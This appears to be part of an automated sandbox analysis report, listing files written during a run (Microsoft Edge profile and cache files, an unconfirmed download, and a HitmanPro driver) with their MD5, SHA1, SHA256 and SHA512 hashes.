| SHA1 | 694005cd9e1a4c54e0b83d0598a8a0c089df1556 |
| SHA256 | 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031 |
| SHA512 | df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0d1055a071a0979c8605092c0e2abd71 |
| SHA1 | 90caba3066c3fafc14c3ecdcc2621a340bfae94d |
| SHA256 | 706a2eaf2e8d892373ae7643d53c89e6b4bd9e34de07c93ce72d7f045847810d |
| SHA512 | ec0c9e1b1a089b81742c0a08f48955462abb35ca25400e2a0b129e73f20f6d95cbcf09e776918015df3a9ade167a48b041818ae5ead032001d53e7f1ef3c91c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a6b5c1d78a466f8d9858a8c6890a70b2 |
| SHA1 | dc95cf6cce8357f2e1a7fcc299d632f16ba3f549 |
| SHA256 | c0b87ec1d43dc3db6c307b9e36f298cab5424a88bae1d524f12b6cc49c1cce73 |
| SHA512 | 8fcbe8002ad80e70ebafcd7e01a477f0464b684cb6d9e13bcb22a92ca07de0bdbfdb504e95ccba3e56dfc31f7ad8a87afae173304dee77529f25d4609bd232bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2870b02dd1dc3b5df0ba481312ee85ad |
| SHA1 | 5771a48f1de9904dd7ba92233a921a553c015c5f |
| SHA256 | 41fc2934bcd8509c15634adc63d4f83359c945e5418805d24ccba93c545b14f3 |
| SHA512 | 2a88164e54c7811da23cdb4065a940a1595b9dc824fbb71755ade0a6c8986c3a84a976bf215e6e2ae36969c96b62eb57dda1cf3213a066c2ea74e46a41af0950 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 2e86a72f4e82614cd4842950d2e0a716 |
| SHA1 | d7b4ee0c9af735d098bff474632fc2c0113e0b9c |
| SHA256 | c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f |
| SHA512 | 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | c813a1b87f1651d642cdcad5fca7a7d8 |
| SHA1 | 0e6628997674a7dfbeb321b59a6e829d0c2f4478 |
| SHA256 | df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3 |
| SHA512 | af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 56d57bc655526551f217536f19195495 |
| SHA1 | 28b430886d1220855a805d78dc5d6414aeee6995 |
| SHA256 | f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4 |
| SHA512 | 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | b275fa8d2d2d768231289d114f48e35f |
| SHA1 | bb96003ff86bd9dedbd2976b1916d87ac6402073 |
| SHA256 | 1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1 |
| SHA512 | d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7421f3dc3bca7e7da99f5596fd498037 |
| SHA1 | 9bf166876952b94c3ccc23e857929bc8893740b1 |
| SHA256 | ec15ae480e6e8546236693850695b73254ea2b24b007f1ab7014836ddc665fad |
| SHA512 | f9e6438c8975f522be23b3f90afbf2b4ed82f9fcb27ff0521835c790c668d160e5372a549fb7f7cb4b6e5e7b951b5b65696ccd734f5b595533848bc2087a8a02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7e896888f1dffbbfa68a56444837b439 |
| SHA1 | d25023163c43d5216d4151fcd6f66ca440f343d7 |
| SHA256 | ddeea2f0bc19336d7cb8cd2f87aee0faacefd87ff640a76b7a3284a32da8e4d8 |
| SHA512 | 099bf717d6938ff3f93cd2133a7a1d09ef5b385833f59fde207208fbd1deaee7653d748ea0913c5bd7364286990839d11536a0fac97d0f8f28a25c8a988d6d21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe591b5e.TMP
| MD5 | 1a75df0cf8a38cdb6e09aeef848801c2 |
| SHA1 | 79c4c7c56decf847f8af98996922725ab9b4fa96 |
| SHA256 | d0791ca45ea1015edab4511607c50f29e0adf95ce23e104c4d133275951a78bf |
| SHA512 | 0e7363ad4d2e07ea0b91273469c789af8fe1b534a9d8679cd19076974ee2675fa63b9750234f5e932caef82721c2f756bc131f7da8571b0c60dd8c48a1011347 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | 2be38925751dc3580e84c3af3a87f98d |
| SHA1 | 8a390d24e6588bef5da1d3db713784c11ca58921 |
| SHA256 | 1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b |
| SHA512 | 1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 9f96d459817e54de2e5c9733a9bbb010 |
| SHA1 | afbadc759b65670865c10b31b34ca3c3e000cd31 |
| SHA256 | 51b37ee622ba3e2210a8175ecd99d26d3a3a9e991368d0efbb705f21ff9ac609 |
| SHA512 | aa2514018ef2e39ebde92125f5cc6fb7f778f2ab3c35d4ec3a075578fda41a76dbd7239fe2ea61533fb3262c04739c6500d1497c006f511aa3142bb2696d2307 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | e29b448723134a2db688bf1a3bf70b37 |
| SHA1 | 3c8eba27ac947808101fa09bfe83723f2ab8d6b0 |
| SHA256 | 349cc041df29f65fd7ffe2944a8872f66b62653bbfbd1f38ce8e6b7947f99a69 |
| SHA512 | 4ce801111cb1144cfd903a94fb9630354bf91a5d46bbbe46e820c98949f57d96ec243b655f2edeb252a4ec6a80167be106d71a4b56b402be264c13cc208f3e2c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cdf8a4727ca2841a99adea8e0c188c3c |
| SHA1 | d3cce1e6240d95094a8a651591cf069102ae659f |
| SHA256 | 88764f2c0db9a95848272cc02c5f14923d9e3e30aefa4df817cbc94101c8519d |
| SHA512 | 6390ae2ca87cf55114209f4c06ada81e534318e24ede2fdfc145315c5cd20f9efa61b10dc6a8e8d0ff5d6f8747303017038cc50d38d9915c53167a29540d2d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8f33c349a04cb08aeefbdd0b4ae513eb |
| SHA1 | 2da5557e317644ae0e38b86e1e2ae01a3bac630e |
| SHA256 | cec1988e72fc7b1f74a63cc0d29950517527f395783289d8ba0cdf211e93f113 |
| SHA512 | c02ca655721a65bf86b784bad69f3d9c87f61b0638d03b131c2290a179c8200c0399e93cb9182c534a6affe0a6c601429a0f6e38d4ba882f2a03a00866d7b74b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4acd7aa52d4d23faed87afd84dc86e4d |
| SHA1 | 4d4a5bd593c958184be32902b3dbf2f51437449c |
| SHA256 | 38c643957086b960a1d4b303224ce2aeeccaff63a521e329fb798d32974251d0 |
| SHA512 | a40b34fc7b8dda2a129758592a2ce83fb9e4ccc6212fb93b7ce56fd977973f6216182095609ad714387a4cea5f9dcaee69339f1f41bd91ee50615f689bbf32f7 |
C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload
| MD5 | 10dc710dd495e9078ce79b26e18591e0 |
| SHA1 | aef434d6b77158dd2accd746bbc727bbc3367adc |
| SHA256 | be5389a28e952d7ab2d9447c1bdb8eb7d11b24cb02e4b18da367715c2acfdd15 |
| SHA512 | 959c5cb47b9d1c21ddfe2eaac14e0c99c758aab85036705c072525e70255957abc97412ab0ceadd2adbebc1b176699614f71bf50689cf9ff97891e6216a15dc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fe936d5a8ca1db0d0fad682a39803be8 |
| SHA1 | c3408e1080c66bd1f7a2c5c78cc17990259523b6 |
| SHA256 | cfa4188133a9e40364d8c32f96e354c35eecb0a65df22ad974fcab1fb919b3ce |
| SHA512 | e08bf22c7aa5b13fc4b3cf85c77f39810ad89661a33af4c50a9618064c5bed055ecdde9c4e385c344046018f249e2ea9041770e25018ca848c5e225b053c530b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | dd2caf1f2ad8e03772db28326f7351cb |
| SHA1 | bb915775112d636a13b1a3bfc0e03fddae13202d |
| SHA256 | 92cd2d831dbdb080d30c06feef0149335202908e9475eb2b8319d5ed1f3c0a07 |
| SHA512 | 3c55b40ef69a2de73a3af36c88617fcbabfe22af38344bacb3b4793ca89a749f9b5084b1bf13726e225abd60c3431b01186011aecd46bebd2599fcf1bd8bde20 |
C:\Windows\System32\drivers\hitmanpro37.sys
| MD5 | 55b9678f6281ff7cb41b8994dabf9e67 |
| SHA1 | 95a6a9742b4279a5a81bef3f6e994e22493bbf9f |
| SHA256 | eb5d9df12ae2770d0e5558e8264cbb1867c618217d10b5115690ab4dcfe893c6 |
| SHA512 | d2270c13dc8212b568361f9d7d10210970b313d8cd2b944f63a626f6e7f2feb19671d3fcdbdf35e593652427521c7c18050c1181dc4c114da96db2675814ab40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 20e7f34c44271d6cde2a092645b15dba |
| SHA1 | 86d7ebfdb069f7e0854f93fee1b7490c13b5f5a2 |
| SHA256 | f8ab4ff2e5cb6cb4be3e3806abe5449d4d3756b93f36e0225c993743c1942640 |
| SHA512 | 38c0d450c41eac45eb63c123c1886690dd484f06d369dd98cb37f44237b8c802d9ce44ea5c3c342e2c5dd8740a639acdfb131131124e3f1c7a670cf335706288 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e7fbbf59f7b19738e76605c5516db1f2 |
| SHA1 | b6b388d9e8f1c16c8cc3ee48bb39c27b9e0aefda |
| SHA256 | 3c4d4d142d4130295ac28fd97855c7d25f989dbf6ca7a90277f03619d092e762 |
| SHA512 | d335e8b4c6615a7faf5f6d7dc34864f38456a3105dc7bb5a68409cfbe05fda332bfe8547f4983172b2b332434b63a2a97b3f505638175dfdb25a3893dd4d02a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000005
| MD5 | fc97b88a7ce0b008366cd0260b0321dc |
| SHA1 | 4eae02aecb04fa15f0bb62036151fa016e64f7a9 |
| SHA256 | 6388415a307a208b0a43b817ccd9e5fcdda9b6939ecd20ef4c0eda1aa3a0e49e |
| SHA512 | 889a0db0eb5ad4de4279b620783964bfda8edc6b137059d1ec1da9282716fe930f8c4ebfadea7cd5247a997f8d4d2990f7b972a17106de491365e3c2d2138175 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | d2de47009fe9073bd140ecb1429e6f0d |
| SHA1 | a1a77144c3ffe60de38eb5daecccdc7bf1d1eced |
| SHA256 | d6eea1ffa740c7842deed381ad338175ec14fecd7ca25245342ca8930ffd0b79 |
| SHA512 | bcd47e091e7309d98c4cabeb782aaecd1e909c61b6254b78dfbb5a9bd1b2c78aac2359514322e82cff3cc7e3e2666161c4e544255495182eef694f87c2e5f409 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001
| MD5 | 1ac9e744574f723e217fb139ef1e86a9 |
| SHA1 | 4194dce485bd10f2a030d2499da5c796dd12630f |
| SHA256 | 4564be03e04002c5f6eaeaea0aff16c5d0bbdad45359aef64f4c199cda8b195e |
| SHA512 | b8515fb4b9470a7ce678331bbd59f44da47b627f87ea5a30d92ec1c6d583f1607539cd9318a5bccf0a0c6c2bd2637992e0519bd37acdf876f7a11ed184fb5109 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002
| MD5 | a33b3a3fdf5161be5bd861804961f557 |
| SHA1 | 68a57897f1686a3e62ce9808165e18f31661d077 |
| SHA256 | ac33d8bc6d9a5e769472877d7dd3d035f8088274b886b16cb1898b106da48560 |
| SHA512 | c94c29a5a9da89044504fe06702f00a7fdd5bc7b85e1733c0cc9a363a812c8d8f95672ea7731643229fa4ae2f1a632c73096d90b63799f5bae7639b41151ccb3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000003
| MD5 | d9ab25168f8f536fdf8f92202c6ac060 |
| SHA1 | 789fa090b18ed4195528196cb8883840fb86c801 |
| SHA256 | 2d4f19e670e3081e0039b061c8d80c8037605d5f8a01a9bd58c4ed1537a253c3 |
| SHA512 | 04edad29dd23e2d5f5d5242cf4d98f35f71100e63eacc4ba297736a944155e96e458f1ec0c08d5cf53ab50031ba4fa06f07b1b349062ff896d8e2134afc48b79 |